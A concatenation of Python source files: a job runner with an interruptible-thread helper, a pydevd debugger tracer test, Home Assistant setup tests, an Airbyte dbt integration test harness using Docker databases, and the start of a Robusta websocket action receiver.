@ Out, None
"""
if not self.hasBeenAdded:
if len(self.subque) == 0:
## Queue is empty!
self.runReturn = None
else:
self.runReturn = self.subque.popleft()
self.hasBeenAdded = True
def start(self):
"""
Method to start the job associated to this Runner
@ In, None
@ Out, None
"""
try:
self.thread = InterruptibleThread(target = lambda q, *arg : q.append(self.functionToRun(*arg)),
name = self.identifier,
args=(self.subque,) + tuple(self.args))
self.thread.daemon = True
self.thread.start()
self.trackTime('runner_started')
self.started = True
except Exception as ae:
self.raiseAWarning(self.__class__.__name__ + " job "+self.identifier+" failed with error:"+ str(ae) +" !",'ExceptedError')
self.returnCode = -1
def kill(self):
"""
Method to kill the job associated to this Runner
@ In, None
@ Out, None
"""
if self.thread is not None:
self.raiseADebug('Terminating job thread "{}" and RAVEN identifier "{}"'.format(self.thread.ident, self.identifier))
while self.thread is not None and self.thread.isAlive():
time.sleep(0.1)
try:
self.thread.raiseException(RuntimeError)
except ValueError:
self.thread = None
self.trackTime('runner_killed')
## The following code is extracted from stack overflow with some minor cosmetic
## changes in order to adhere to RAVEN code standards:
## https://stackoverflow.com/questions/323972/is-there-any-way-to-kill-a-thread-in-python
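## Note that PyThreadState_SetAsyncExc only *schedules* the exception: CPython
## delivers it the next time the target thread executes Python bytecode, so a
## thread blocked inside a C-level call (time.sleep, socket.accept, lock waits)
## will not be interrupted until that call returns.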
def _asyncRaise(tid, exceptionType):
"""
    Raises an exception in the thread with id tid
@ In, tid, integer, this variable represents the id of the thread to raise an exception
@ In, exceptionType, Exception, the type of exception to throw
@ Out, None
"""
if not inspect.isclass(exceptionType):
raise TypeError("Only types can be raised (not instances)")
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, ctypes.py_object(exceptionType))
if res == 0:
raise ValueError("invalid thread id")
elif res != 1:
# "if it returns a number greater than one, you're in trouble,
# and you should call it again with exc=NULL to revert the effect"
ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, 0)
raise SystemError("PyThreadState_SetAsyncExc failed")
class InterruptibleThread(threading.Thread):
"""
  A thread class that supports raising an exception in the thread from another thread.
"""
def raiseException(self, exceptionType):
"""
Raises the given exception type in the context of this thread.
If the thread is busy in a system call (time.sleep(), socket.accept(), ...), the exception is simply ignored.
If you are sure that your exception should terminate the thread, one way to ensure that it works is:
t = InterruptibleThread( ... )
...
t.raiseException( SomeException )
while t.isAlive():
time.sleep( 0.1 )
t.raiseException( SomeException )
If the exception is to be caught by the thread, you need a way to check that your thread has caught it.
      CAREFUL : this function is executed in the context of the caller thread, to raise an exception in the context of the
thread represented by this instance.
@ In, exceptionType, Exception, the type of exception to raise in this thread
@ Out, None
"""
if self.isAlive():
## Assuming Python 2.6+, we can remove the need for the _get_my_tid as
      ## specified in the Stack Overflow answer
_asyncRaise( self.ident, exceptionType )
|
_debugger_case_check_tracer.py
|
import threading, atexit, sys
from collections import namedtuple
import os.path
if sys.version_info[0] >= 3:
from _thread import start_new_thread
else:
from thread import start_new_thread
FrameInfo = namedtuple('FrameInfo', 'filename, name, f_trace')
def _atexit():
sys.stderr.flush()
sys.stdout.flush()
# Register the TEST SUCEEDED msg to the exit of the process.
atexit.register(_atexit)
def _iter_frame_info(frame):
while frame is not None:
yield FrameInfo(
os.path.basename(frame.f_code.co_filename),
frame.f_code.co_name,
frame.f_trace.__name__ if frame.f_trace is not None else "None"
)
frame = frame.f_back
def check_frame_info(expected):
found = list(_iter_frame_info(sys._getframe().f_back))
def fail():
raise AssertionError('Expected:\n%s\n\nFound:\n%s\n' % (
'\n'.join(str(x) for x in expected),
'\n'.join(str(x) for x in found)))
for found_info, expected_info in zip(found, expected):
if found_info.filename != expected_info.filename or found_info.name != expected_info.name:
fail()
for f_trace in expected_info.f_trace.split('|'):
if f_trace == found_info.f_trace:
break
else:
fail()
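# Note: an expected f_trace entry may list several accepted tracer names
# separated by '|' (e.g. 'trace_dispatch|None'); check_frame_info() accepts the
# frame if the observed f_trace matches any of them.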
def thread_func():
if sys.version_info[0] >= 3:
check_frame_info([
FrameInfo(filename='_debugger_case_check_tracer.py', name='thread_func', f_trace='trace_exception'),
FrameInfo(filename='threading.py', name='run', f_trace='None'),
FrameInfo(filename='threading.py', name='_bootstrap_inner', f_trace='trace_unhandled_exceptions'),
FrameInfo(filename='threading.py', name='_bootstrap', f_trace='None'),
FrameInfo(filename='pydev_monkey.py', name='__call__', f_trace='None')
])
else:
check_frame_info([
FrameInfo(filename='_debugger_case_check_tracer.py', name='thread_func', f_trace='trace_exception'),
FrameInfo(filename='threading.py', name='run', f_trace='None'),
FrameInfo(filename='threading.py', name='__bootstrap_inner', f_trace='trace_unhandled_exceptions'),
FrameInfo(filename='threading.py', name='__bootstrap', f_trace='None'),
FrameInfo(filename='pydev_monkey.py', name='__call__', f_trace='None'),
])
th = threading.Thread(target=thread_func)
th.daemon = True
th.start()
event = threading.Event()
def thread_func2():
try:
check_frame_info([
FrameInfo(filename='_debugger_case_check_tracer.py', name='thread_func2', f_trace='trace_exception'),
FrameInfo(filename='pydev_monkey.py', name='__call__', f_trace='trace_unhandled_exceptions')
])
finally:
event.set()
start_new_thread(thread_func2, ())
event.wait()
th.join()
# This is a bit tricky: although we waited on the event, there's a slight chance
# that we didn't get the notification because the thread could've stopped executing,
# so, sleep a bit so that the test does not become flaky.
import time
time.sleep(.3)
if sys.version_info[0] >= 3:
check_frame_info([
FrameInfo(filename='_debugger_case_check_tracer.py', name='<module>', f_trace='trace_exception'),
FrameInfo(filename='_pydev_execfile.py', name='execfile', f_trace='None'),
FrameInfo(filename='pydevd.py', name='_exec', f_trace='trace_unhandled_exceptions'),
FrameInfo(filename='pydevd.py', name='run', f_trace='trace_dispatch|None'),
FrameInfo(filename='pydevd.py', name='main', f_trace='trace_dispatch|None'),
FrameInfo(filename='pydevd.py', name='<module>', f_trace='trace_dispatch|None')
])
else:
check_frame_info([
FrameInfo(filename='_debugger_case_check_tracer.py', name='<module>', f_trace='trace_exception'),
FrameInfo(filename='pydevd.py', name='_exec', f_trace='trace_unhandled_exceptions'),
FrameInfo(filename='pydevd.py', name='run', f_trace='trace_dispatch|None'),
FrameInfo(filename='pydevd.py', name='main', f_trace='trace_dispatch|None'),
FrameInfo(filename='pydevd.py', name='<module>', f_trace='trace_dispatch|None'),
])
print('TEST SUCEEDED')
|
test_setup.py
|
"""Test component/platform setup."""
# pylint: disable=protected-access
import asyncio
import os
from unittest import mock
import threading
import logging
import voluptuous as vol
from homeassistant.core import callback
from homeassistant.const import (
EVENT_HOMEASSISTANT_START, EVENT_COMPONENT_LOADED)
import homeassistant.config as config_util
from homeassistant import setup, loader
import homeassistant.util.dt as dt_util
from homeassistant.helpers.config_validation import (
PLATFORM_SCHEMA, PLATFORM_SCHEMA_BASE)
from homeassistant.helpers import discovery
from tests.common import \
get_test_home_assistant, MockModule, MockPlatform, \
assert_setup_component, get_test_config_dir, mock_integration, \
mock_entity_platform
ORIG_TIMEZONE = dt_util.DEFAULT_TIME_ZONE
VERSION_PATH = os.path.join(get_test_config_dir(), config_util.VERSION_FILE)
_LOGGER = logging.getLogger(__name__)
class TestSetup:
"""Test the bootstrap utils."""
hass = None
backup_cache = None
# pylint: disable=invalid-name, no-self-use
def setup_method(self, method):
"""Set up the test."""
self.hass = get_test_home_assistant()
def teardown_method(self, method):
"""Clean up."""
self.hass.stop()
def test_validate_component_config(self):
"""Test validating component configuration."""
config_schema = vol.Schema({
'comp_conf': {
'hello': str
}
}, required=True)
mock_integration(
self.hass,
MockModule('comp_conf', config_schema=config_schema))
with assert_setup_component(0):
assert not setup.setup_component(self.hass, 'comp_conf', {})
self.hass.data.pop(setup.DATA_SETUP)
with assert_setup_component(0):
assert not setup.setup_component(self.hass, 'comp_conf', {
'comp_conf': None
})
self.hass.data.pop(setup.DATA_SETUP)
with assert_setup_component(0):
assert not setup.setup_component(self.hass, 'comp_conf', {
'comp_conf': {}
})
self.hass.data.pop(setup.DATA_SETUP)
with assert_setup_component(0):
assert not setup.setup_component(self.hass, 'comp_conf', {
'comp_conf': {
'hello': 'world',
'invalid': 'extra',
}
})
self.hass.data.pop(setup.DATA_SETUP)
with assert_setup_component(1):
assert setup.setup_component(self.hass, 'comp_conf', {
'comp_conf': {
'hello': 'world',
}
})
def test_validate_platform_config(self, caplog):
"""Test validating platform configuration."""
platform_schema = PLATFORM_SCHEMA.extend({
'hello': str,
})
platform_schema_base = PLATFORM_SCHEMA_BASE.extend({
})
mock_integration(
self.hass,
MockModule('platform_conf',
platform_schema_base=platform_schema_base),
)
mock_entity_platform(
self.hass,
'platform_conf.whatever',
MockPlatform(platform_schema=platform_schema))
with assert_setup_component(1):
assert setup.setup_component(self.hass, 'platform_conf', {
'platform_conf': {
'platform': 'whatever',
'hello': 'world',
'invalid': 'extra',
}
})
assert caplog.text.count('Your configuration contains '
'extra keys') == 1
self.hass.data.pop(setup.DATA_SETUP)
self.hass.config.components.remove('platform_conf')
with assert_setup_component(2):
assert setup.setup_component(self.hass, 'platform_conf', {
'platform_conf': {
'platform': 'whatever',
'hello': 'world',
},
'platform_conf 2': {
'platform': 'whatever',
'invalid': True
}
})
assert caplog.text.count('Your configuration contains '
'extra keys') == 2
self.hass.data.pop(setup.DATA_SETUP)
self.hass.config.components.remove('platform_conf')
with assert_setup_component(0):
assert setup.setup_component(self.hass, 'platform_conf', {
'platform_conf': {
'platform': 'not_existing',
'hello': 'world',
}
})
self.hass.data.pop(setup.DATA_SETUP)
self.hass.config.components.remove('platform_conf')
with assert_setup_component(1):
assert setup.setup_component(self.hass, 'platform_conf', {
'platform_conf': {
'platform': 'whatever',
'hello': 'world',
}
})
self.hass.data.pop(setup.DATA_SETUP)
self.hass.config.components.remove('platform_conf')
with assert_setup_component(1):
assert setup.setup_component(self.hass, 'platform_conf', {
'platform_conf': [{
'platform': 'whatever',
'hello': 'world',
}]
})
self.hass.data.pop(setup.DATA_SETUP)
self.hass.config.components.remove('platform_conf')
# Any falsey platform config will be ignored (None, {}, etc)
with assert_setup_component(0) as config:
assert setup.setup_component(self.hass, 'platform_conf', {
'platform_conf': None
})
assert 'platform_conf' in self.hass.config.components
assert not config['platform_conf'] # empty
assert setup.setup_component(self.hass, 'platform_conf', {
'platform_conf': {}
})
assert 'platform_conf' in self.hass.config.components
assert not config['platform_conf'] # empty
def test_validate_platform_config_2(self, caplog):
"""Test component PLATFORM_SCHEMA_BASE prio over PLATFORM_SCHEMA."""
platform_schema = PLATFORM_SCHEMA.extend({
'hello': str,
})
platform_schema_base = PLATFORM_SCHEMA_BASE.extend({
'hello': 'world',
})
mock_integration(
self.hass,
MockModule('platform_conf',
platform_schema=platform_schema,
platform_schema_base=platform_schema_base))
mock_entity_platform(
self.hass,
'platform_conf.whatever',
MockPlatform('whatever',
platform_schema=platform_schema))
with assert_setup_component(1):
assert setup.setup_component(self.hass, 'platform_conf', {
# fail: no extra keys allowed in platform schema
'platform_conf': {
'platform': 'whatever',
'hello': 'world',
'invalid': 'extra',
}
})
assert caplog.text.count('Your configuration contains '
'extra keys') == 1
self.hass.data.pop(setup.DATA_SETUP)
self.hass.config.components.remove('platform_conf')
with assert_setup_component(1):
assert setup.setup_component(self.hass, 'platform_conf', {
# pass
'platform_conf': {
'platform': 'whatever',
'hello': 'world',
},
# fail: key hello violates component platform_schema_base
'platform_conf 2': {
'platform': 'whatever',
'hello': 'there'
}
})
self.hass.data.pop(setup.DATA_SETUP)
self.hass.config.components.remove('platform_conf')
def test_validate_platform_config_3(self, caplog):
"""Test fallback to component PLATFORM_SCHEMA."""
component_schema = PLATFORM_SCHEMA_BASE.extend({
'hello': str,
})
platform_schema = PLATFORM_SCHEMA.extend({
'cheers': str,
'hello': 'world',
})
mock_integration(
self.hass,
MockModule('platform_conf',
platform_schema=component_schema))
mock_entity_platform(
self.hass,
'platform_conf.whatever',
MockPlatform('whatever',
platform_schema=platform_schema))
with assert_setup_component(1):
assert setup.setup_component(self.hass, 'platform_conf', {
'platform_conf': {
'platform': 'whatever',
'hello': 'world',
'invalid': 'extra',
}
})
assert caplog.text.count('Your configuration contains '
'extra keys') == 1
self.hass.data.pop(setup.DATA_SETUP)
self.hass.config.components.remove('platform_conf')
with assert_setup_component(1):
assert setup.setup_component(self.hass, 'platform_conf', {
# pass
'platform_conf': {
'platform': 'whatever',
'hello': 'world',
},
# fail: key hello violates component platform_schema
'platform_conf 2': {
'platform': 'whatever',
'hello': 'there'
}
})
self.hass.data.pop(setup.DATA_SETUP)
self.hass.config.components.remove('platform_conf')
def test_validate_platform_config_4(self):
"""Test entity_namespace in PLATFORM_SCHEMA."""
component_schema = PLATFORM_SCHEMA_BASE
platform_schema = PLATFORM_SCHEMA
mock_integration(
self.hass,
MockModule('platform_conf',
platform_schema_base=component_schema))
mock_entity_platform(
self.hass,
'platform_conf.whatever',
MockPlatform(platform_schema=platform_schema))
with assert_setup_component(1):
assert setup.setup_component(self.hass, 'platform_conf', {
'platform_conf': {
# pass: entity_namespace accepted by PLATFORM_SCHEMA
'platform': 'whatever',
'entity_namespace': 'yummy',
}
})
self.hass.data.pop(setup.DATA_SETUP)
self.hass.config.components.remove('platform_conf')
def test_component_not_found(self):
"""setup_component should not crash if component doesn't exist."""
assert setup.setup_component(self.hass, 'non_existing') is False
def test_component_not_double_initialized(self):
"""Test we do not set up a component twice."""
mock_setup = mock.MagicMock(return_value=True)
mock_integration(
self.hass,
MockModule('comp', setup=mock_setup))
assert setup.setup_component(self.hass, 'comp')
assert mock_setup.called
mock_setup.reset_mock()
assert setup.setup_component(self.hass, 'comp')
assert not mock_setup.called
@mock.patch('homeassistant.util.package.install_package',
return_value=False)
def test_component_not_installed_if_requirement_fails(self, mock_install):
"""Component setup should fail if requirement can't install."""
self.hass.config.skip_pip = False
mock_integration(
self.hass,
MockModule('comp', requirements=['package==0.0.1']))
assert not setup.setup_component(self.hass, 'comp')
assert 'comp' not in self.hass.config.components
def test_component_not_setup_twice_if_loaded_during_other_setup(self):
"""Test component setup while waiting for lock is not set up twice."""
result = []
@asyncio.coroutine
def async_setup(hass, config):
"""Tracking Setup."""
result.append(1)
mock_integration(
self.hass,
MockModule('comp', async_setup=async_setup))
def setup_component():
"""Set up the component."""
setup.setup_component(self.hass, 'comp')
thread = threading.Thread(target=setup_component)
thread.start()
setup.setup_component(self.hass, 'comp')
thread.join()
assert len(result) == 1
def test_component_not_setup_missing_dependencies(self):
"""Test we do not set up a component if not all dependencies loaded."""
deps = ['maybe_existing']
mock_integration(self.hass, MockModule('comp', dependencies=deps))
assert not setup.setup_component(self.hass, 'comp', {})
assert 'comp' not in self.hass.config.components
self.hass.data.pop(setup.DATA_SETUP)
mock_integration(self.hass, MockModule('comp2', dependencies=deps))
mock_integration(self.hass, MockModule('maybe_existing'))
assert setup.setup_component(self.hass, 'comp2', {})
def test_component_failing_setup(self):
"""Test component that fails setup."""
mock_integration(
self.hass,
MockModule('comp', setup=lambda hass, config: False))
assert not setup.setup_component(self.hass, 'comp', {})
assert 'comp' not in self.hass.config.components
def test_component_exception_setup(self):
"""Test component that raises exception during setup."""
def exception_setup(hass, config):
"""Raise exception."""
raise Exception('fail!')
mock_integration(self.hass,
MockModule('comp', setup=exception_setup))
assert not setup.setup_component(self.hass, 'comp', {})
assert 'comp' not in self.hass.config.components
def test_component_setup_with_validation_and_dependency(self):
"""Test all config is passed to dependencies."""
def config_check_setup(hass, config):
"""Test that config is passed in."""
if config.get('comp_a', {}).get('valid', False):
return True
raise Exception('Config not passed in: {}'.format(config))
platform = MockPlatform()
mock_integration(self.hass,
MockModule('comp_a', setup=config_check_setup))
mock_integration(
self.hass,
MockModule('platform_a',
setup=config_check_setup,
dependencies=['comp_a']),
)
mock_entity_platform(self.hass, 'switch.platform_a', platform)
setup.setup_component(self.hass, 'switch', {
'comp_a': {
'valid': True
},
'switch': {
'platform': 'platform_a',
}
})
assert 'comp_a' in self.hass.config.components
def test_platform_specific_config_validation(self):
"""Test platform that specifies config."""
platform_schema = PLATFORM_SCHEMA.extend({
'valid': True,
}, extra=vol.PREVENT_EXTRA)
mock_setup = mock.MagicMock(spec_set=True)
mock_entity_platform(
self.hass,
'switch.platform_a',
MockPlatform(platform_schema=platform_schema,
setup_platform=mock_setup))
with assert_setup_component(0, 'switch'):
assert setup.setup_component(self.hass, 'switch', {
'switch': {
'platform': 'platform_a',
'invalid': True
}
})
assert mock_setup.call_count == 0
self.hass.data.pop(setup.DATA_SETUP)
self.hass.config.components.remove('switch')
with assert_setup_component(0):
assert setup.setup_component(self.hass, 'switch', {
'switch': {
'platform': 'platform_a',
'valid': True,
'invalid_extra': True,
}
})
assert mock_setup.call_count == 0
self.hass.data.pop(setup.DATA_SETUP)
self.hass.config.components.remove('switch')
with assert_setup_component(1, 'switch'):
assert setup.setup_component(self.hass, 'switch', {
'switch': {
'platform': 'platform_a',
'valid': True
}
})
assert mock_setup.call_count == 1
def test_disable_component_if_invalid_return(self):
"""Test disabling component if invalid return."""
mock_integration(
self.hass,
MockModule('disabled_component', setup=lambda hass, config: None))
assert not setup.setup_component(self.hass, 'disabled_component')
assert loader.get_component(self.hass, 'disabled_component') is None
assert 'disabled_component' not in self.hass.config.components
self.hass.data.pop(setup.DATA_SETUP)
mock_integration(
self.hass,
MockModule('disabled_component', setup=lambda hass, config: False))
assert not setup.setup_component(self.hass, 'disabled_component')
assert loader.get_component(
self.hass, 'disabled_component') is not None
assert 'disabled_component' not in self.hass.config.components
self.hass.data.pop(setup.DATA_SETUP)
mock_integration(
self.hass,
MockModule('disabled_component', setup=lambda hass, config: True))
assert setup.setup_component(self.hass, 'disabled_component')
assert loader.get_component(
self.hass, 'disabled_component') is not None
assert 'disabled_component' in self.hass.config.components
def test_all_work_done_before_start(self):
"""Test all init work done till start."""
call_order = []
def component1_setup(hass, config):
"""Set up mock component."""
discovery.discover(hass, 'test_component2',
component='test_component2')
discovery.discover(hass, 'test_component3',
component='test_component3')
return True
def component_track_setup(hass, config):
"""Set up mock component."""
call_order.append(1)
return True
mock_integration(
self.hass,
MockModule('test_component1', setup=component1_setup))
mock_integration(
self.hass,
MockModule('test_component2', setup=component_track_setup))
mock_integration(
self.hass,
MockModule('test_component3', setup=component_track_setup))
@callback
def track_start(event):
"""Track start event."""
call_order.append(2)
self.hass.bus.listen_once(EVENT_HOMEASSISTANT_START, track_start)
self.hass.add_job(setup.async_setup_component(
self.hass, 'test_component1', {}))
self.hass.block_till_done()
self.hass.start()
assert call_order == [1, 1, 2]
@asyncio.coroutine
def test_component_cannot_depend_config(hass):
"""Test config is not allowed to be a dependency."""
result = yield from setup._async_process_dependencies(
hass, None, 'test', ['config'])
assert not result
@asyncio.coroutine
def test_component_warn_slow_setup(hass):
"""Warn we log when a component setup takes a long time."""
mock_integration(hass, MockModule('test_component1'))
with mock.patch.object(hass.loop, 'call_later', mock.MagicMock()) \
as mock_call:
result = yield from setup.async_setup_component(
hass, 'test_component1', {})
assert result
assert mock_call.called
assert len(mock_call.mock_calls) == 3
timeout, logger_method = mock_call.mock_calls[0][1][:2]
assert timeout == setup.SLOW_SETUP_WARNING
assert logger_method == setup._LOGGER.warning
assert mock_call().cancel.called
@asyncio.coroutine
def test_platform_no_warn_slow(hass):
"""Do not warn for long entity setup time."""
mock_integration(
hass,
MockModule('test_component1', platform_schema=PLATFORM_SCHEMA))
with mock.patch.object(hass.loop, 'call_later', mock.MagicMock()) \
as mock_call:
result = yield from setup.async_setup_component(
hass, 'test_component1', {})
assert result
assert not mock_call.called
async def test_when_setup_already_loaded(hass):
"""Test when setup."""
calls = []
async def mock_callback(hass, component):
"""Mock callback."""
calls.append(component)
setup.async_when_setup(hass, 'test', mock_callback)
await hass.async_block_till_done()
assert calls == []
hass.config.components.add('test')
hass.bus.async_fire(EVENT_COMPONENT_LOADED, {
'component': 'test'
})
await hass.async_block_till_done()
assert calls == ['test']
# Event listener should be gone
hass.bus.async_fire(EVENT_COMPONENT_LOADED, {
'component': 'test'
})
await hass.async_block_till_done()
assert calls == ['test']
# Should be called right away
setup.async_when_setup(hass, 'test', mock_callback)
await hass.async_block_till_done()
assert calls == ['test', 'test']
|
dbt_integration_test.py
|
#
# MIT License
#
# Copyright (c) 2020 Airbyte
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
import json
import os
import random
import re
import shutil
import socket
import string
import subprocess
import sys
import threading
import time
from typing import Any, Dict, List
from normalization.destination_type import DestinationType
from normalization.transform_config.transform import TransformConfig
class DbtIntegrationTest(object):
def __init__(self):
self.target_schema = "test_normalization"
self.container_prefix = f"test_normalization_db_{self.random_string(3)}"
self.db_names = ["postgres", "mysql"]
@staticmethod
def random_string(length: int) -> str:
return "".join(random.choice(string.ascii_lowercase) for i in range(length))
def setup_db(self):
self.setup_postgres_db()
self.setup_mysql_db()
def setup_postgres_db(self):
print("Starting localhost postgres container for tests")
port = self.find_free_port()
config = {
"host": "localhost",
"username": "integration-tests",
"password": "integration-tests",
"port": port,
"database": "postgres",
"schema": self.target_schema,
}
commands = [
"docker",
"run",
"--rm",
"--name",
f"{self.container_prefix}_postgres",
"-e",
f"POSTGRES_USER={config['username']}",
"-e",
f"POSTGRES_PASSWORD={config['password']}",
"-p",
f"{config['port']}:5432",
"-d",
"postgres",
]
print("Executing: ", " ".join(commands))
subprocess.call(commands)
time.sleep(120)
if not os.path.exists("../secrets"):
os.makedirs("../secrets")
with open("../secrets/postgres.json", "w") as fh:
fh.write(json.dumps(config))
def setup_mysql_db(self):
print("Starting localhost mysql container for tests")
port = self.find_free_port()
config = {
"host": "localhost",
"port": port,
"database": self.target_schema,
"username": "root",
"password": "",
}
commands = [
"docker",
"run",
"--rm",
"--name",
f"{self.container_prefix}_mysql",
"-e",
"MYSQL_ALLOW_EMPTY_PASSWORD=yes",
"-e",
"MYSQL_INITDB_SKIP_TZINFO=yes",
"-e",
f"MYSQL_DATABASE={config['database']}",
"-p",
f"{config['port']}:3306",
"-d",
"mysql",
]
print("Executing: ", " ".join(commands))
subprocess.call(commands)
time.sleep(120)
if not os.path.exists("../secrets"):
os.makedirs("../secrets")
with open("../secrets/mysql.json", "w") as fh:
fh.write(json.dumps(config))
@staticmethod
def find_free_port():
"""
        Find an unused localhost port on which a test database container (postgres or mysql) can listen
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("", 0))
addr = s.getsockname()
s.close()
return addr[1]
def tear_down_db(self):
for db_name in self.db_names:
print(f"Stopping localhost {db_name} container for tests")
try:
subprocess.call(["docker", "kill", f"{self.container_prefix}_{db_name}"])
except Exception as e:
print(f"WARN: Exception while shutting down {db_name}: {e}")
@staticmethod
def change_current_test_dir(request):
# This makes the test run whether it is executed from the tests folder (with pytest/gradle)
# or from the base-normalization folder (through pycharm)
integration_tests_dir = os.path.join(request.fspath.dirname, "integration_tests")
if os.path.exists(integration_tests_dir):
os.chdir(integration_tests_dir)
else:
os.chdir(request.fspath.dirname)
def generate_profile_yaml_file(self, destination_type: DestinationType, test_root_dir: str) -> Dict[str, Any]:
"""
Each destination requires different settings to connect to. This step generates the adequate profiles.yml
as described here: https://docs.getdbt.com/reference/profiles.yml
"""
config_generator = TransformConfig()
profiles_config = config_generator.read_json_config(f"../secrets/{destination_type.value.lower()}.json")
# Adapt credential file to look like destination config.json
if destination_type.value == DestinationType.BIGQUERY.value:
credentials = profiles_config
profiles_config = {
"credentials_json": json.dumps(credentials),
"dataset_id": self.target_schema,
"project_id": credentials["project_id"],
}
elif destination_type.value == DestinationType.MYSQL.value:
profiles_config["database"] = self.target_schema
else:
profiles_config["schema"] = self.target_schema
profiles_yaml = config_generator.transform(destination_type, profiles_config)
config_generator.write_yaml_config(test_root_dir, profiles_yaml)
return profiles_config
@staticmethod
def run_destination_process(message_file: str, test_root_dir: str, commands: List[str]):
print("Executing: ", " ".join(commands))
with open(os.path.join(test_root_dir, "destination_output.log"), "ab") as f:
process = subprocess.Popen(commands, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
def writer():
if os.path.exists(message_file):
with open(message_file, "rb") as input_data:
while True:
line = input_data.readline()
if not line:
break
process.stdin.write(line)
process.stdin.close()
thread = threading.Thread(target=writer)
thread.start()
for line in iter(process.stdout.readline, b""):
f.write(line)
sys.stdout.write(line.decode("utf-8"))
thread.join()
process.wait()
return process.returncode == 0
def dbt_run(self, test_root_dir: str):
"""
Run the dbt CLI to perform transformations on the test raw data in the destination
"""
# Perform sanity check on dbt project settings
assert self.run_check_dbt_command("debug", test_root_dir)
assert self.run_check_dbt_command("deps", test_root_dir)
final_sql_files = os.path.join(test_root_dir, "final")
shutil.rmtree(final_sql_files, ignore_errors=True)
# Compile dbt models files into destination sql dialect, then run the transformation queries
assert self.run_check_dbt_command("run", test_root_dir)
@staticmethod
def run_check_dbt_command(command: str, cwd: str) -> bool:
"""
Run dbt subprocess while checking and counting for "ERROR", "FAIL" or "WARNING" printed in its outputs
"""
error_count = 0
commands = [
"docker",
"run",
"--rm",
"--init",
"-v",
f"{cwd}:/workspace",
"-v",
f"{cwd}/build:/build",
"-v",
f"{cwd}/final:/build/run/airbyte_utils/models/generated",
"-v",
"/tmp:/tmp",
"--network",
"host",
"--entrypoint",
"/usr/local/bin/dbt",
"-i",
"airbyte/normalization:dev",
command,
"--profiles-dir=/workspace",
"--project-dir=/workspace",
]
print("Executing: ", " ".join(commands))
print(f"Equivalent to: dbt {command} --profiles-dir={cwd} --project-dir={cwd}")
with open(os.path.join(cwd, "dbt_output.log"), "ab") as f:
process = subprocess.Popen(commands, cwd=cwd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=os.environ)
for line in iter(lambda: process.stdout.readline(), b""):
f.write(line)
str_line = line.decode("utf-8")
sys.stdout.write(str_line)
# keywords to match lines as signaling errors
if "ERROR" in str_line or "FAIL" in str_line or "WARNING" in str_line:
# exception keywords in lines to ignore as errors (such as summary or expected warnings)
is_exception = False
for except_clause in [
"Done.", # DBT Summary
"PASS=", # DBT Summary
"Nothing to do.", # When no schema/data tests are setup
"Configuration paths exist in your dbt_project.yml", # When no cte / view are generated
"Error loading config file: .dockercfg: $HOME is not defined", # ignore warning
]:
if except_clause in str_line:
is_exception = True
break
if not is_exception:
# count lines signaling an error/failure/warning
error_count += 1
process.wait()
message = (
f"{' '.join(commands)}\n\tterminated with return code {process.returncode} "
f"with {error_count} 'Error/Warning/Fail' mention(s)."
)
print(message)
assert error_count == 0, message
assert process.returncode == 0, message
if error_count > 0:
return False
return process.returncode == 0
@staticmethod
def copy_replace(src, dst, pattern=None, replace_value=None):
"""
Copies a file from src to dst replacing pattern by replace_value
Parameters
----------
src : string
Path to the source filename to copy from
dst : string
Path to the output filename to copy to
pattern
list of Patterns to replace inside the src file
replace_value
list of Values to replace by in the dst file
"""
file1 = open(src, "r") if isinstance(src, str) else src
file2 = open(dst, "w") if isinstance(dst, str) else dst
pattern = [pattern] if isinstance(pattern, str) else pattern
replace_value = [replace_value] if isinstance(replace_value, str) else replace_value
if replace_value and pattern:
if len(replace_value) != len(pattern):
raise Exception("Invalid parameters: pattern and replace_value" " have different sizes.")
rules = [(re.compile(regex, re.IGNORECASE), value) for regex, value in zip(pattern, replace_value)]
else:
rules = []
for line in file1:
if rules:
for rule in rules:
line = re.sub(rule[0], rule[1], line)
file2.write(line)
if isinstance(src, str):
file1.close()
if isinstance(dst, str):
file2.close()
|
receiver.py
|
import hmac
import logging
import time
import traceback
import websocket
import json
import os
from threading import Thread
from pydantic import BaseModel
from ..core.playbooks.playbooks_event_handler import PlaybooksEventHandler
from ..core.model.env_vars import INCOMING_REQUEST_TIME_WINDOW_SECONDS, RUNNER_VERSION
from robusta.core.reporting.action_requests import (
ExternalActionRequest,
ActionRequestBody,
sign_action_request,
)
WEBSOCKET_RELAY_ADDRESS = os.environ.get(
"WEBSOCKET_RELAY_ADDRESS", "wss://relay.robusta.dev"
)
CLOUD_ROUTING = json.loads(os.environ.get("CLOUD_ROUTING", "True").lower())
RECEIVER_ENABLE_WEBSOCKET_TRACING = json.loads(
os.environ.get("RECEIVER_ENABLE_WEBSOCKET_TRACING", "False").lower()
)
INCOMING_WEBSOCKET_RECONNECT_DELAY_SEC = int(
os.environ.get("INCOMING_WEBSOCKET_RECONNECT_DELAY_SEC", 3)
)
class ActionRequestReceiver:
def __init__(self, event_handler: PlaybooksEventHandler):
self.event_handler = event_handler
self.active = True
self.account_id = self.event_handler.get_global_config().get("account_id")
self.cluster_name = self.event_handler.get_global_config().get("cluster_name")
self.ws = websocket.WebSocketApp(
WEBSOCKET_RELAY_ADDRESS,
on_open=self.on_open,
on_message=self.on_message,
on_error=self.on_error,
)
if not self.account_id or not self.cluster_name:
logging.error(
f"Action receiver cannot start. "
f"Missing required account_id {self.account_id} cluster_name {self.cluster_name}"
)
return
self.start_receiver()
